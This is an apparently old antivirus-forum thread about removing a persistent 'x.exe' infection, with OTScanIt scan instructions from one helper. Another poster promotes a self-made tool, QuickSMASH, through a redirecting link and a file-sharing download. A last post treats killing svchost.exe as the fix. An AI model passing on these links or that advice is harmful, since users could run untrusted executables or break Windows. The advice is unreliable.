This one is extremely difficult to get rid of as there is within your system a randomly named ini or exe file that has to be located and deleted. By itself the file looks and scans as totally innocuous. The last one that I cured was running via CMD.exe a legitimate windows file
If you start a new thread I will assist you there otherwise it could get confusing with multiple users in the same thread (for me that is ;D )
The initial logs that i would requires is as below: (by the way Avast sometimes gets a hissy fit with GMER)
To ensure that I get all the information this log will need to be uploaded to Mediafire (http://www.mediafire.com/) and post the sharing link.
Download OTScanit (http://download.bleepingcomputer.com/oldtimer/OTScanIt.exe) to your Desktop and double-click on it to extract the files. It will create a folder named OTScanIt on your desktop.
- Close ALL OTHER PROGRAMS.
- Open the OTScanit folder and double-click on OTScanit.exe to start the program.
- Check the box that says Scan All User Accounts
- Check the Radio button for Rootkit check YES
- Check the Radio buttons for Files/Folders Created Within 90 Days and Files/Folders Modified Within 90 Days
- Under Additional Scans check the following:
- File - Lop Check
- Reg - BotCheck
- File - Additional Folder Scans
- File - Purity Scan
- Now click the Run Scan button on the toolbar.
- Let it run unhindered until it finishes.
- When the scan is complete Notepad will open with the report file loaded in it.
- Click the Format menu and make sure that Wordwrap is not checked. If it is then click on it to uncheck it.
-
Hi essexboy,
I have posted the log in this new thread: http://forum.avast.com/index.php?topic=40611.0
tx for helping us :D
Nico
-
Try using quicksmash. Just follow the quicksmash assistance instruction.
Check it here:
http://t68kv.net76.net/
If your afraid or cannot understand much about the software feel free to pm me thru instant messenger.
I already tested and remove that x.exe but of course test it first before we say it is very effective if it removed yours.
t68kv
-
Why do you post a url that redirects to hXXp://t68kv.multiply.com/ why not just post that URL ?
I get very twitchy (especially when it is security related) when URLs I might click on redirect, other than the likes of tinyurl.com, etc. that are known redirect services.
I guess because it is on multiply, that accounts for the googleadservices.
-
ow sorry, you ask why not use the multply url directly? Answer is to make my web account "http://t68kv.net76.net/" active and use them to update some of files used these tools "very small file storage". Not for google ads or any more purposes to earn something. :)
(http://i135.photobucket.com/albums/q148/t68kv/QuickSMASHAssistance.gif)
QUICKSMASH ASSISTANCE
1. Download quicksmash, after downloading open it.
2. Check "include hijackthislog", "Update Before Smashing".
3. Follow the steps on uploading the log created by the quicksmash.
Wait for the "Finish" message, and follow the instruction on the next messageboxes.
Usually the filename is named at the current date on you computer. EX "13-08-2008"
4. Post the link, The link must be working for fast response from the team.
5. Wait For Response Or Further Instruction From T68KV or Other Reliable Team Member.
Usually they will tell you to redo the instruction. After Updating the Defintion.
Quicksmash
http://www.4shared.com/file/49439376/457533bb/QuickSMASH.html (http://www.4shared.com/file/49439376/457533bb/QuickSMASH.html)
-
that annoying x.exe is coming back after four months but now with a infected png file.
defense+ detected a buffer overflow with svchost.exe (found in system32 folder).
If I skipped the alert, the infected png file will come with x.exe .
However, terminating svchost.exe will cause the pc not to shutdown using windows. The only way to turn off the pc is to press the power button in the cpu for about 6 seconds.
Terminating svchost is a better option than becoming infected.
Well, I think that this problem is solved for now.